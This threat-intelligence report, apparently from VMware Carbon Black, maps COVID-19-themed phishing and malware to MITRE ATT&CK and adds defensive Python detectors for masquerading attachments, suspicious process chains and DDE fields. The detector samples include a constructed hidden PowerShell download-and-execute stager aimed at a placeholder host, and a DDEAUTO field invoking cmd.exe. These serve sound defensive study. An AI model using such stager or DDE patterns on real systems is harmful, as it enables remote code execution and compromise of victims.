The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Because the number of Indicators of Compromise (IOCs) is growing rapidly, this report covers the key behaviors by aligning them to the MITRE ATT&CK Framework rather than cataloguing individual indicators.
MITRE ATT&CK, first released publicly in 2015, is a knowledge base of adversary tactics and techniques that describes the objectives an attack generally pursues and the methods used to reach them. The intent of the framework is to provide “better detection of post-compromise cyber adversary behavior”. The framework is gaining increasing adoption in the security community, and VMware Carbon Black actively maps its products to it to provide added context for customers.
Phishing email is the primary delivery vector: malicious attachments carry payloads that infect the victim's machine. Recently observed payloads deliver trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. One analyzed variant overlapped with the APT41 (also referred to as WINNTI) threat group, which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. Together these observations show an increased risk to corporate as well as personal security, at a time when many countries and corporations are enforcing remote working.
Background
The COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown, leading to a climate of uncertainty. Unfortunately, during times of uncertainty and doubt threat actors are ready to take advantage of the widespread desire to be informed, and this is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and overloaded with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, using Coronavirus themed lures to deliver malware.
While this technique isn't new, history has shown that cyber crime often increases during times of heightened emotion, distraction and stress, such as religious or festive holidays, elections, and even Black Friday sales events. The actors exploit these challenging times to find avenues for distributing their malware.
This article aims to increase awareness of recently observed threats that leverage the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the framework matters because a growing number of IOCs is being produced daily. Historically, as in the case of Emotet, handling such large volumes of IOCs can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense.
The intent is to raise awareness among customers, SOC teams, IR partners, MSSPs and all defenders in the InfoSec community, and to aid them in detecting, protecting against and responding to such malware. To that end we examine the types of attacks that appear to be most common.
For further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: Cybersecurity Community Resources page.
Technical Analysis
In the following section we focus on the first two tactics in the MITRE ATT&CK framework, Initial Access and Execution, because these are where we have observed the largest overlap between the multiple actors we are tracking. VMware Carbon Black's Threat Analysis Unit (TAU) will follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.
Before introducing these two tactics we want to highlight one of the most frequently leveraged techniques. Masquerading (T1036) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused to evade defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. As in campaigns that target religious or festive holidays, masquerading is the ideal technique for bad actors who have no regard for their victims: their mission is clear, and masquerading helps them evade defenses and get a few steps closer to achieving their goals.
Initial Access
Initial Access is the first tactic employed by bad actors hoping to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information about COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps and fake software. The intent is to catch the end user off guard in order to deliver the malware. Other Initial Access techniques could include drive-by compromise (T1189) and supply chain compromise (T1195); the rapid registration of coronavirus themed domain names tracked by MalwarePatrol.net, over 5000 at the time of writing, supports this concern. Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites where they become subject to drive-by or supply chain compromise. The list can be found here.
Spearphishing Attachment – TID:T1193
Attachments are a popular choice for obtaining an initial infection. Observed attachment file types include, but are not limited to, ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC and XLS. Phishing emails may use spoofed headers and authentic-looking messaging to lull the victim into a false sense of security, and attachment names are chosen to arouse enough curiosity that the end user feels the need to open them. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. That said, more advanced threat actors are particularly good at producing authentic-looking email, as we will see later in this report.
Figure 1: Phishing email example containing malicious Word document attachment
A common technique is to place enticing content in a malicious Microsoft Office attachment to convince the user to click the prompt it displays. Doing so invokes the malicious code embedded in the document, which is usually a VBA macro.
Figure 2: Typical end-user prompt to trigger embedded payload
In our next example we see an ISO file included as an attachment.
Figure 3: Phishing email example containing malicious ISO file attachment
The ISO attachment contains an SCR file, which is actually a PE executable. When executed, the PE file deploys Remcos, a prolific RAT that is continually updated and sold on the Dark Web. The diagram below shows the underlying effects of opening this particular email attachment.
Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard
In the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page.
Figure 5: Example PDF Attachment containing clickable link
If the user clicks the link within the PDF, they are presented with a landing page masquerading as a legitimate Office365 page.
Figure 6: Fake Office365 landing page
After the user clicks the “download file” button, they are presented with a fake Office365 login prompt that harvests any credentials the end user enters.
Figure 7: Fake Office365 login prompt
In the next example an attachment named ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z contains an executable which, when opened, deploys AgentTesla. Threat actors use AgentTesla to record keystrokes and other sensitive information and send it back over the C2 channel.
Figure 8: 7z file containing executable
Another example uses an attachment named AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe (note the fake _pdf suffix on an executable) which, when opened, launches RegAsm (T1121) to deliver Lokibot, another popular and highly effective information stealer. The executable contains an embedded AutoIT script that delivers the main payload.
Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file
Another attachment named COVID-19.INFO.37842702.doc installs a trojan by leveraging PowerShell (T1086) and CSCRIPT (signed script proxy execution, T1216) to launch a VBS file, a common scripting (T1064) technique.
Figure 10: Execution path displayed within VMware Carbon Black EDR
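As an added illustration (not part of the original report and not code from any Carbon Black product), the following Python helper applies the masquerading checks implied by the attachments above: it compares an attachment's extension with its real content via file signatures, catches the ISO-contains-SCR-that-is-a-PE case, and flags document-style names such as DOCUMENT_pdf.exe. The sample bytes are constructed file headers, not malware, and the extension groupings and rule names are the author's assumptions.

```python
"""Attachment triage for the masquerading (T1036) patterns discussed above.

Hypothetical helper, not Carbon Black code: it compares an attachment's name
with its real content and flags the disguises seen in the samples.
"""
import re

# Extension groups built from the attachment types listed on the page.
CONTAINER_EXTS = {"zip", "7z", "tar", "rar", "gz", "iso", "img"}
EXECUTABLE_EXTS = {"exe", "scr", "jar"}
SCRIPT_EXTS = {"vbs", "js", "jse", "wsf", "hta"}
DOCUMENT_EXTS = {"doc", "docx", "xls", "xlsx", "rtf", "pdf"}

# File signatures (offset, bytes, content type) for the formats discussed.
MAGIC = [
    (0, b"MZ", "pe"),                                # Windows PE: EXE, SCR, DLL
    (0, b"%PDF", "pdf"),
    (0, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),  # legacy DOC/XLS (OLE2)
    (0, b"PK\x03\x04", "zip"),                       # ZIP, also DOCX/XLSX/JAR
    (0, b"7z\xbc\xaf\x27\x1c", "7z"),
    (0, b"Rar!\x1a\x07", "rar"),
    (0, b"{\\rt", "rtf"),
    (0x8001, b"CD001", "iso"),                       # ISO 9660 volume descriptor
]

# Content types that are legitimate for a given extension.
EXPECTED = {
    "exe": {"pe"}, "scr": {"pe"}, "pdf": {"pdf"}, "rtf": {"rtf"},
    "doc": {"ole", "zip", "rtf"}, "xls": {"ole", "zip"},
    "docx": {"zip"}, "xlsx": {"zip"}, "zip": {"zip"}, "jar": {"zip"},
    "7z": {"7z"}, "rar": {"rar"}, "iso": {"iso"},
}

DOC_SUFFIX_RE = re.compile(r"[_\-](pdf|docx?|xlsx?|txt)$")


def sniff(data):
    """Return the content type implied by the file's magic bytes."""
    for offset, sig, name in MAGIC:
        if data[offset:offset + len(sig)] == sig:
            return name
    return "unknown"


def triage(name, data):
    """Classify one attachment and list the masquerading indicators it shows."""
    parts = name.lower().split(".")
    exts = parts[1:]                      # 'x.doc.exe' -> ['doc', 'exe']
    ext = exts[-1] if exts else ""
    stem = ".".join(parts[:-1]) if exts else parts[0]
    content = sniff(data)
    findings = []
    if ext in EXECUTABLE_EXTS or content == "pe":
        findings.append("executable")
    if ext in SCRIPT_EXTS:
        findings.append("script")
    if ext in CONTAINER_EXTS:
        findings.append("container (unpack and triage contents)")
    # 'report.doc.exe': a document extension hidden before the real one
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and ext not in DOCUMENT_EXTS:
        findings.append("double extension")
    # 'DOCUMENT_pdf.exe': a document name suffix on a non-document extension
    if ext not in DOCUMENT_EXTS and DOC_SUFFIX_RE.search(stem):
        findings.append("document-style name on non-document extension")
    # An SCR that is a PE is legitimate; a PE behind a .doc name is not
    if ext in EXPECTED and content != "unknown" and content not in EXPECTED[ext]:
        findings.append(f"extension '{ext}' does not match content '{content}'")
    return {"name": name, "extension": ext, "content": content, "findings": findings}


# Constructed sample inputs: names taken from the report; bytes are synthetic
# file headers only (no real malware).
PE_STUB = b"MZ" + b"\x00" * 62
PDF_STUB = b"%PDF-1.7\n%constructed sample\n"
SEVENZ_STUB = b"7z\xbc\xaf\x27\x1c" + b"\x00" * 26
ISO_STUB = b"\x00" * 0x8001 + b"CD001" + b"\x00" * 10
SAMPLES = [
    ("ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z", SEVENZ_STUB),
    ("AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe", PE_STUB),
    ("COVID-19.INFO.37842702.doc", PE_STUB),        # PE disguised with a .doc name
    ("coronavirus_update.iso", ISO_STUB),
    ("invoice.pdf", PDF_STUB),                      # benign control
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        r = triage(name, data)
        print(f"{r['name']!r}: {r['content']} -> {r['findings'] or 'clean'}")
```

The content check is what catches the SCR-inside-ISO and PE-named-.doc cases regardless of how the name is dressed up; the name checks only add the cheap disguises a mail gateway can reject outright. Containers are flagged for unpacking rather than judged, since the malicious file is the one inside.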
Execution
User Execution (T1204) covers the end user opening a phishing email or attachment. Other specific TTPs have also been observed during the execution of Coronavirus themed payloads.
PowerShell (T1086):
When a particular MS Word attachment named “CORONA VIRUS REMEDY ISREAL.doc” is opened, it executes an obfuscated command in a hidden PowerShell window. This in turn invokes two signed Microsoft binaries, csc.exe and cvtres.exe, which are commonly seen in the defense evasion technique Compile After Delivery (T1500). Such behaviors are common in commodity malware and are highly effective at delivering and compiling a payload using legitimate Windows binaries.
Figure 11: Snippet of obfuscated Powershell command
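The chains described above (an Office document launching hidden, encoded PowerShell that drives csc.exe and cvtres.exe; PowerShell launching cscript with a VBS file; an executable launching RegAsm) can be expressed as parent/child rules over process-creation telemetry. The following is an added example in Python and not Carbon Black EDR's detection logic; the events are constructed to mirror the report's chains plus one benign build, the ATT&CK IDs are those used on this page, and the example.invalid host in the encoded command is a reserved documentation name, not an indicator.

```python
"""Process-lineage detection for the execution chains described above.

Added example, not Carbon Black EDR logic: simple parent/child rules run over
constructed process-creation events shaped like EDR telemetry.
"""
import base64
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "cscript.exe", "wscript.exe", "mshta.exe"}
OFFICE_CHILD_SUSPECTS = SCRIPT_HOSTS | {"regsvr32.exe", "rundll32.exe", "certutil.exe", "msiexec.exe"}
BUILD_TOOLS = {"msbuild.exe", "devenv.exe", "dotnet.exe"}   # where csc.exe/RegAsm are expected
HIDDEN_RE = re.compile(r"-w(?:indowstyle|in)?\s+hidden", re.I)
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.I)
USER_SCRIPT_RE = re.compile(r'\\(?:temp|appdata|downloads)\\[^\s"]*\.(?:vbs|vbe|js|jse)\b', re.I)


def decode_encoded_command(cmdline):
    """Decode PowerShell -EncodedCommand (base64 of UTF-16LE); None if absent."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestors(index, pid):
    """Lower-cased image names of parent, grandparent, ... for pid (cycle-safe)."""
    seen, out, ppid = set(), [], index[pid]["ppid"]
    while ppid in index and ppid not in seen:
        seen.add(ppid)
        out.append(index[ppid]["image"].lower())
        ppid = index[ppid]["ppid"]
    return out


def detect(events):
    """Return (pid, technique, detail) alerts using the ATT&CK IDs on this page."""
    index = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image, cmd = e["image"].lower(), e["cmdline"]
        lineage = ancestors(index, e["pid"])
        parent = lineage[0] if lineage else ""
        # T1204: an Office application spawning a script host or LOLBin
        if parent in OFFICE and image in OFFICE_CHILD_SUSPECTS:
            alerts.append((e["pid"], "T1204", f"{parent} spawned {image}"))
        # T1086: PowerShell with a hidden window or an encoded command
        if image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cmd)
            if HIDDEN_RE.search(cmd) or decoded:
                alerts.append((e["pid"], "T1086", decoded or "hidden window"))
        # T1500: csc.exe always spawns cvtres.exe, so alert on csc.exe itself,
        # and only when it runs under a script host/Office rather than a build tool
        if image == "csc.exe" and not (set(lineage) & BUILD_TOOLS) and (set(lineage) & (SCRIPT_HOSTS | OFFICE)):
            alerts.append((e["pid"], "T1500", f"csc.exe under {' <- '.join(lineage)}"))
        # T1121: RegAsm/RegSvcs launched outside a build tool
        if image in {"regasm.exe", "regsvcs.exe"} and not (set(lineage) & BUILD_TOOLS):
            alerts.append((e["pid"], "T1121", f"{image} launched by {parent}"))
        # T1064: a script host running a script from a user-writable location
        if image in {"cscript.exe", "wscript.exe"} and USER_SCRIPT_RE.search(cmd):
            alerts.append((e["pid"], "T1064", cmd))
    return alerts


# Constructed stager carried by the hidden PowerShell; example.invalid is a
# reserved documentation host, not a real indicator.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/covid')"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed: the report's three chains plus a benign build
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE", "cmdline": r'WINWORD.EXE /n "CORONA VIRUS REMEDY ISREAL.doc"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe", "cmdline": f"powershell.exe -NoP -w hidden -enc {ENCODED}"},
    {"pid": 400, "ppid": 300, "image": "csc.exe", "cmdline": r"csc.exe /noconfig /fullpaths @C:\Users\alice\AppData\Local\Temp\k3ab.cmdline"},
    {"pid": 500, "ppid": 400, "image": "cvtres.exe", "cmdline": "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
    {"pid": 600, "ppid": 100, "image": "WINWORD.EXE", "cmdline": r'WINWORD.EXE /n "COVID-19.INFO.37842702.doc"'},
    {"pid": 700, "ppid": 600, "image": "powershell.exe", "cmdline": r"powershell.exe -ep bypass -File C:\Users\alice\AppData\Local\Temp\a.ps1"},
    {"pid": 800, "ppid": 700, "image": "cscript.exe", "cmdline": r'cscript.exe //B //Nologo "C:\Users\alice\AppData\Local\Temp\covid.vbs"'},
    {"pid": 900, "ppid": 100, "image": "AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe", "cmdline": '"AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe"'},
    {"pid": 1000, "ppid": 900, "image": "RegAsm.exe", "cmdline": "RegAsm.exe"},
    {"pid": 1100, "ppid": 1, "image": "MSBuild.exe", "cmdline": "MSBuild.exe app.csproj"},
    {"pid": 1200, "ppid": 1100, "image": "csc.exe", "cmdline": r"csc.exe /noconfig @obj\Debug\app.cmdline"},
    {"pid": 1300, "ppid": 1200, "image": "cvtres.exe", "cmdline": "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
]

if __name__ == "__main__":
    for pid, technique, detail in detect(SAMPLE_EVENTS):
        print(pid, technique, detail)
```

The lineage walk is what keeps the csc.exe rule quiet for the MSBuild chain while still firing for the same binary two hops below WINWORD.EXE; decoding the encoded command turns an opaque base64 blob into something an analyst can read and pivot on.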
Dynamic Data Exchange (T1173):
Malicious MS Office documents continue to succeed against unpatched versions of MS Office. Note that DDE (T1173) is a legitimate Office feature abused for command execution rather than a vulnerability; the CVEs commonly seen alongside it, CVE-2012-0158 (the MSCOMCTL ActiveX control), CVE-2017-11882 and CVE-2018-0798 (both in the Equation Editor, EQNEDT32.EXE), are memory corruption bugs in Office components that require patching rather than a configuration change.
In a recent Coronavirus themed MS Word attachment, MS Word is the target of exploitation for client execution (T1203): the document launches the MS Equation Editor and exploits it to achieve signed binary proxy execution (T1218). In this instance the activity was found to overlap with the APT41 (also referred to as WINNTI) threat group, which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.
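Both the DDE field abuse covered by T1173 and the embedded Equation Editor objects that the Equation Editor CVEs rely on are visible statically in the document XML before the file is ever opened. The following Python check is an added example, not TAU tooling: it rebuilds field codes that have been split across multiple w:instrText runs (a common evasion), flags DDE/DDEAUTO instructions, and reports embedded OLE objects whose ProgID starts with Equation. The .docx it scans is constructed in memory and its DDE command merely echoes a string.

```python
"""Static check for the Office tricks in the section above: DDE/DDEAUTO field
codes (T1173) and embedded Equation Editor objects.

Added example, not TAU tooling; the .docx it scans is built in memory here.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
O = "{urn:schemas-microsoft-com:office:office}"
DDE_RE = re.compile(r"^\s*(?:DDEAUTO|DDE)\b", re.I)


def field_instructions(root):
    """Reassemble field codes. Attackers split DDEAUTO across many w:instrText
    runs and nest fields (QUOTE), so walk begin/end markers with a stack."""
    stack, found = [], []
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                found.append("".join(stack.pop()))
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")
        elif el.tag == W + "fldSimple":          # single-element field form
            found.append(el.get(W + "instr", ""))
    return found


def scan_docx(data):
    """Return (finding, part, detail) tuples for every word/*.xml part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for part in z.namelist():
            if not (part.startswith("word/") and part.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(part))
            for instr in field_instructions(root):
                if DDE_RE.match(instr):
                    findings.append(("DDE field (T1173)", part, instr.strip()))
            for ole in root.iter(O + "OLEObject"):
                progid = ole.get("ProgID", "")
                if progid.lower().startswith("equation."):
                    findings.append(("Equation Editor object", part, progid))
    return findings


# Constructed sample document: one benign PAGE field, one DDEAUTO field split
# over three runs, and an embedded Equation.3 object. The command only echoes.
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

DOCUMENT_XML = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
            xmlns:o="urn:schemas-microsoft-com:office:office"
            xmlns:v="urn:schemas-microsoft-com:vml">
<w:body>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText> PAGE </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve">DDEAUTO c:\windows\</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">system32\cmd.exe </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"/c echo constructed-sample"</w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>COVID-19 update</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
<w:p><w:r><w:object><v:shape id="_x0000_i1025"/>
<o:OLEObject Type="Embed" ProgID="Equation.3" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1"/>
</w:object></w:r></w:p>
</w:body></w:document>"""


def build_sample_docx(document_xml=DOCUMENT_XML):
    """Write a minimal .docx package to bytes (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_docx(build_sample_docx()):
        print(finding)
```

Matching on the reassembled instruction rather than on individual runs is the important part: a document whose DDEAUTO is spread over a dozen runs, or tucked inside a QUOTE field, yields no single element containing the keyword. The ProgID check is a heuristic; legitimate equations also embed Equation.3 objects, so it is a reason to detonate or inspect, not a verdict.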
More on Masquerading
Masquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded. There is evidence that the following categories of software are being weaponized in order to target potential victims.
Fake VPN clients/installers:
A recent report highlights that, while people around the world adapt to working from home for the foreseeable future, a growing amount of malware is being disguised as VPN clients and installers. The example discussed in the report delivers the AZORult information stealer via a fake ProtonVPN client; once executed, the victim machine becomes part of the AZORult botnet.
Remote meeting software:
TAU is currently monitoring for the appearance of weaponized or fake remote meeting software, and anticipates an increase over the coming weeks as more people around the world rely on remote working.
Mobile apps:
Avast has recently released a repository for researchers and defenders in response to the growing number of Coronavirus apps appearing for Android users. In a recent report, a fake Android Coronavirus app was discovered to be delivering ransomware.
Figure 12: Snippet showing potential malicious and fake apps
Fake Coronavirus maps:
In a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information.
Figure 13: Malicious fake Coronavirus map
Ransomware
Data Encrypted for Impact (T1486) is observed with a newly reported ransomware family known as Coronavirus. TAU has observed an upward trend in ransomware for some time, but sadly there has never been a better time for threat actors to create and distribute it. Ransomware is an ongoing threat that TAU watches very closely; a full write-up of this new campaign will be published soon.
Figure 14: Coronavirus ransomware message
Summary
The threats we are seeing that leverage the COVID-19 pandemic are varied but mostly familiar. The key point is that uncertainty and the thirst for knowledge about the global pandemic, coupled with the shift to remote working, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. Some public IOC lists exist, but the current global situation could bring a significant increase in attacks, and the volume of IOCs may soon become unmanageable. Understanding the behaviors and leveraging the MITRE ATT&CK Framework will help to detect and mitigate these threats. While Coronavirus themed malware includes a variety of different threats, many of the techniques are seen in regular commodity malware. As ever, a layered approach should be taken to reduce the risk. Defenders should be extra vigilant, not only staying up to date with future Coronavirus related threats but also advising their family, friends and colleagues of them.
Indicators of Compromise (IOCs)
Please refer to the VMware Carbon Black TAU Github page for a list of IOCs.